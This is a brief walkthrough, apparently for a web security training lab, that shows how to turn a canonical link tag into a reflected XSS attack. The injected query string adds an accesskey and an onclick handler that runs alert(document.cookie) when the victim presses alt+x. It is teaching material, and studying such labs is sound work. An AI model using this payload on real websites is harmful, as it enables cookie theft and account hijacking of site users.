Objective
After you land the lab’s home page, view the page source(CTRL+U) and examine canonical link is used in the <head> section.
What is a canonical URL
A canonical URL is the URL of the best representative page from a group of duplicate pages, according to Google. For example, if you have two URLs for the same page (such as example.com? dress=1234 and example.com/dresses/1234 ), Google chooses one as canonical.
In some cases, it is possible to use accessKey attribute in canonical link tags.
What is the accessKey attribute
The accesskey global attribute provides a hint for generating a keyboard shortcut for the current element. The attribute value must consist of a single printable character (which includes accented and other characters that can be generated by the keyboard).
You can basically define accessKey attribute like accessKey=”$keybutton”, in this case you need to assume that victim user is going to press the key combination of “alt + x”.
Crafting the Payload
-
Defining the accessKey attribute
accessKey = "x"; -
Combining with event handler
accessKey="x" onclick=alert(1) -
Final Payload
Scheme of the payload <link rel="canonical" href="https://PATH-TO-LAB/$input" /> input = ?'accesskey='x'onclick='alert(document.cookie)'
Modify the payload according to your Lab’s URL and fire the payload. You should see something similar to that:
